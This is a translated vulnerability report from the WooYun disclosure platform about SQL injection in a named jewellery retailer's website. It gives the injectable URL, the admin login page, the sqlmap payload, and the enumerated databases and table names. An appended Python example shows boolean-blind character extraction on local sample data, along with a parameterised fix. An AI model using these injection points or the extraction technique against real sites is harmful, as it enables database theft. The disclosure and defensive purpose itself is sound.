Vulnerability summary  Followers: 24
Defect ID: wooyun-2015-094297
Title: SQL injection on a well-known jewellery e-commerce site (database can be dumped)
Vendor: 某知名珠宝 (a well-known jewellery company)
Author: 黄泉哥
Submitted: 2015-01-28 15:13
Fix deadline: 2015-03-14 15:14
Published: 2015-03-14 15:14
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: vendor could not be reached, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-01-28: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-03-14: the vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
A well-known domestic jewellery website has a SQL injection vulnerability; the database can be dumped, leading to information disclosure.
Detailed description:
http://www.dionly.com/jiamengdian/agent.aspx?id=1  (injection point: the id GET parameter)
http://ht.dionly.com/Join/login.asp  (back-end admin login)
Proof of vulnerability:
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9456=9456
---
available databases [11]:
[*] Dionly_CMS
[*] Dionly_CMS_CX
[*] Dionly_PAD
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] risun_DB_432
[*] tempdb
[*] YDX
Database: Dionly_PAD
[45 tables]
+-------------------------+
| Address |
| Admin |
| Admin_Grant |
| Admin_IPRange |
| Admin_Log |
| Agent |
| Agent_Staff |
| Baike |
| Baike_Class |
| Base_Area |
| Base_BankAccount |
| Base_ColorJewel |
| Base_Gold |
| Base_IP |
| Base_Module |
| Base_Pearl |
| Base_Product_CustomType |
| Base_RingSizeRate |
| Base_TinyDiamond |
| Cart |
| Certify |
| Data |
| Diamond |
| Diamond_Temp |
| Diamond_W1 |
| Diamond_WG |
| Document |
| Favorite |
| Flow |
| GoToShop |
| Message |
| MobileProduct |
| News |
| News_Class |
| Order |
| Order_Diamond |
| Order_Fee |
| Order_Memo |
| Order_Product |
| Order_State |
| Parameter |
| Product |
| Recommend |
| User |
| User_ValidCode |
+-------------------------+
The database was not dumped; the property management fee has already been paid..
Fix recommendation:
You know better than I do..
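As an added illustration that is not part of the original report and not the site's code: the script below models the boolean-based blind oracle sqlmap reported on agent.aspx?id= (payload `id=1 AND 9456=9456`), shows how such an oracle is turned into data extraction, and places the parameterised query that closes the hole beside it. sqlite3 stands in for the SQL Server 2008 backend; the Agent and Admin tables and their rows are constructed sample data, and the names page_vulnerable, page_fixed, oracle_differs and blind_extract are hypothetical.

```python
"""Added example (not from the original WooYun report): a local model of the
boolean-based blind SQL injection sqlmap reported on agent.aspx?id=, and of
the parameterised query that closes it.

Assumptions: sqlite3 stands in for the SQL Server 2008 backend; the Agent and
Admin tables and their rows are constructed sample data; all function names
here are hypothetical, not the site's code.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Agent (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO Agent VALUES (1, 'Shanghai store');
CREATE TABLE Admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO Admin VALUES (1, 'admin', 'S3cret!');
""")


def page_vulnerable(id_param: str) -> bool:
    """Models the injectable page: the raw id parameter is concatenated into
    the WHERE clause. True means the page found an agent and renders it,
    False means it did not; that difference is the blind oracle."""
    sql = "SELECT name FROM Agent WHERE id=" + id_param
    return conn.execute(sql).fetchone() is not None


def page_fixed(id_param: str) -> bool:
    """Hardened page: reject anything that is not a plain integer, then bind
    the value as a query parameter so it can never alter the SQL."""
    if not id_param.isdigit():
        return False
    sql = "SELECT name FROM Agent WHERE id=?"
    return conn.execute(sql, (int(id_param),)).fetchone() is not None


def oracle_differs(page) -> bool:
    """sqlmap's confirmation step for 'AND boolean-based blind': a true and a
    false tautology (id=1 AND 9456=9456 versus id=1 AND 9456=9457) must
    produce different responses."""
    return page("1 AND 9456=9456") != page("1 AND 9456=9457")


def blind_extract(page, expr: str, max_len: int = 64) -> str:
    """Recover the string result of an SQL expression through the oracle,
    one character at a time, by binary search over its code point (0..127).
    SQLite's unicode(substr(...)) is the stand-in for SQL Server's
    UNICODE(SUBSTRING(...)); unicode('') is NULL, so the comparison is false
    past the end of the string and the loop stops."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if page(f"1 AND unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # no character at this position: end of string
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    secret = "SELECT password FROM Admin WHERE id=1"
    print("oracle on vulnerable page:", oracle_differs(page_vulnerable))
    print("extracted:", blind_extract(page_vulnerable, secret))
    print("oracle on fixed page:", oracle_differs(page_fixed))
    print("extracted from fixed page:", repr(blind_extract(page_fixed, secret)))
```

Against the vulnerable page the two tautologies return different results and the admin password is recovered with roughly seven requests per character; against the fixed page the oracle collapses (both payloads are rejected before reaching the database) and nothing is extracted. The same two measures apply to the real ASP.NET page: validate that id is an integer and pass it through a SqlParameter instead of string concatenation, and run the application's database login with no rights on master, msdb and the other databases listed above.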
Copyright notice: when reposting, please credit the source: 黄泉哥@乌云
Vulnerability response
Vendor response:
The vendor could not be reached, or the vendor actively refused to respond.